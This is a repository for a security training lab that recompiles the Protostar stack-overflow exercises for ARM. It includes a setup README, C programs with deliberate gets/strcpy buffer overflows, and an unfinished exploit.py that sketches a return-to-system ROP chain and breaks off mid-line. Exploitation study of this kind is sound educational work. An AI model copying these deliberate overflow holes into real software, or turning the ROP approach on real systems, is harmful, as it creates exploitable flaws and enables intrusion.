├── README.md
└── protostar
    ├── stack0
    │   ├── exploit.py
    │   ├── stack0
    │   └── stack0.c
    ├── stack1
    │   ├── stack1
    │   └── stack1.c
    ├── stack2
    │   ├── stack2
    │   └── stack2.c
    ├── stack3
    │   ├── stack3
    │   └── stack3.c
    ├── stack4
    │   ├── stack4
    │   └── stack4.c
    ├── stack5
    │   ├── stack5
    │   └── stack5.c
    ├── stack6
    │   ├── stack6
    │   └── stack6.c
    └── stack7
        ├── stack7
        └── stack7.c

/README.md:
--------------------------------------------------------------------------------
# exploit-exercises-arm
I have taken all of the challenges from Protostar (https://exploit-exercises.com/protostar/) and compiled them for the ARM architecture. The QEMU setup I am using locally includes GEF (https://github.com/hugsy/gef), Capstone, ROPGadget, and the Radare2 Python bindings.

**I will be adding the Format, Heap, Net and Final exercises over the next two weeks - Check back soon!**

SSH
---

```
# Password is raspberry
ssh pi@127.0.0.1 -p 5022
```

Socat
-----

```
nc -vv 127.0.0.1 5023
localhost [127.0.0.1] 5023 (htuilsrv) open
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Total received bytes: 0
Total sent bytes: 155

pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ ulimit -c unlimited
pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ socat tcp-l:6666,reuseaddr,fork exec:"./stack0"
pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ ls
core stack0 stack0.c
```

GEF
---
```
pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ gdb -c core
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "arm-linux-gnueabihf".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
gef loaded, `gef help' to start, `gef config' to configure
30 commands loaded (10 sub-commands), using Python engine 2.7
[New LWP 2672]
Core was generated by `./stack0'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414140 in ?? ()
gef> gef help
====================[ GEF - GDB Enhanced Features ]====================
aslr -- View/modify GDB ASLR behavior.
assemble -- AssembleCommand: using radare2 to assemble code (requires r2 Python bindings)
        Architecture can be set in GEF runtime config (default is x86).
        Use `list' subcommand to list architectures supported
checksec -- Checksec.sh (http://www.trapkit.de/tools/checksec.html) port.
context -- Display execution context.
cs-dis -- Use capstone disassembly framework to disassemble code.
ctf-exploit-templater -- Generates a ready-to-use exploit template for CTF.
deref -- Dereference recursively an address and display information
dump-memory -- Dump chunks of memory into raw file on the filesystem. Dump file
        name template can be defined in GEF runtime config
elf-info -- Display ELF header informations.
entry-break -- Tries to find best entry point and sets a temporary breakpoint on it.
fd -- Enumerate file descriptors opened by process.
fmtstr-helper -- Exploitable format-string helper (experimental)
gef-alias -- GEF defined aliases
heap -- Get some information about the Glibc heap structure.
inspect-stack -- Exploiter-friendly top-down stack inspection command (peda-like)
invoke -- InvokeCommand: invoke an external command and display result.
ksymaddr -- Solve kernel symbols from kallsyms table.
patch -- Patch the instruction pointed by parameters with NOP. If the return option is
        specified, it will set the return register to the specific value.
pattern -- Metasploit-like pattern generation/search
ps -- List and filter process.
reg -- Display full details on one, many or all registers value from current architecture.
reset-cache -- Reset cache of all stored data.
ropgadget -- ROPGadget (http://shell-storm.org/project/ROPgadget) plugin
shellcode -- ShellcodeCommand uses @JonathanSalwan simple-yet-awesome shellcode API to
        download shellcodes
trace-run -- Create a runtime trace of all instructions executed from $pc to LOCATION specified.
vmmap -- Display virtual memory mapping
xd -- Display arranged hexdump (according to architecture endianness) of memory range.
xfiles -- Shows all libraries (and sections) loaded by binary (Truth is out there).
xinfo -- Get virtual section information for specific address
xor-memory -- XOR a block of memory.
```
--------------------------------------------------------------------------------
/protostar/stack0/exploit.py:
--------------------------------------------------------------------------------
#!/usr/local/bin/python

import subprocess
from struct import *

# libc
# 0xb6ebc000

# 0x000ce774 : pop {r0, r1, r2, r3, fp, lr} ; bx lr
# b6f8a774

# system()
# 0xb6ed2cb8

# 0xbefff90e: "SHELL=/bin/bash"
# 0xbefff914
# 0xbeffff5c

buf = 'A' * 72
buf += pack("
--------------------------------------------------------------------------------
/protostar/stack0/stack0.c:
--------------------------------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    modified = 0;

    gets(buffer);

    if (modified != 0) {
        printf("You have changed the 'modified' variables!\n");
    } else {
        printf("Try again?!\n");
    }

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack1/stack1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack1/stack1
--------------------------------------------------------------------------------
/protostar/stack1/stack1.c:
--------------------------------------------------------------------------------
//
//  stack1.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>    /* errx() */

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    if (argc == 1) {
        errx(1, "Please specify an argument!\n");
    }

    modified = 0;
    strcpy(buffer, argv[1]);

    if (modified == 0x61626364) {
        printf("You have correctly got the variable to the right value!\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack2/stack2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack2/stack2
--------------------------------------------------------------------------------
/protostar/stack2/stack2.c:
--------------------------------------------------------------------------------
//
//  stack2.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>    /* errx() */

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    char *variable;

    variable = getenv("GREENIE");

    if (variable == NULL) {
        errx(1, "Please set the Greenie environment variable!\n");
    }

    modified = 0;

    strcpy(buffer, variable);

    if (modified == 0x0d0a0d0a) {
        printf("You have correctly modified the variabele\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}
--------------------------------------------------------------------------------
/protostar/stack3/stack3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack3/stack3
--------------------------------------------------------------------------------
/protostar/stack3/stack3.c:
--------------------------------------------------------------------------------
//
//  stack3.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("Code flow successfully changed!\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();
    char buffer[64];
    fp = 0;

    gets(buffer);

    if (fp) {
        /* the value of fp is the format argument; it was missing here */
        printf("Calling function pointer, jumping to 0x%08x\n", (unsigned int)fp);
        fp();
    }

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack4/stack4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack4/stack4
--------------------------------------------------------------------------------
/protostar/stack4/stack4.c:
--------------------------------------------------------------------------------
//
//  stack4.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("Code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack5/stack5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack5/stack5
--------------------------------------------------------------------------------
/protostar/stack5/stack5.c:
--------------------------------------------------------------------------------
//
//  stack5.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack6/stack6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack6/stack6
--------------------------------------------------------------------------------
/protostar/stack6/stack6.c:
--------------------------------------------------------------------------------
//
//  stack6.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
    char buffer[64];
    unsigned int ret;

    printf("Input path please: "); fflush(stdout);

    gets(buffer);

    /* return address of this frame; cast because the builtin yields void * */
    ret = (unsigned int)__builtin_return_address(0);

    if ((ret & 0xbe000000) == 0xbe000000) {
        printf("Bzzzt (%p) \n", ret);
        _exit(1);
    }

    printf("Got path: %s\n", buffer);
}

int main(int argc, char **argv)
{
    getpath();

    return 0;
}
--------------------------------------------------------------------------------
/protostar/stack7/stack7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack7/stack7
--------------------------------------------------------------------------------
/protostar/stack7/stack7.c:
--------------------------------------------------------------------------------
//
//  stack7.c
//
//
//  Created by rotlogix on 4/5/15.
//
//

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
    char buffer[64];
    unsigned int ret;

    printf("Input path please: "); fflush(stdout);

    gets(buffer);

    /* return address of this frame; cast because the builtin yields void * */
    ret = (unsigned int)__builtin_return_address(0);

    if ((ret & 0xb0000000) == 0xb0000000) {
        printf("Bzzzt (%p)\n", ret);
        _exit(1);
    }

    printf("Got path: %s\n", buffer);
    return strdup(buffer);
}

int main(int argc, char **argv)
{
    getpath();
}
--------------------------------------------------------------------------------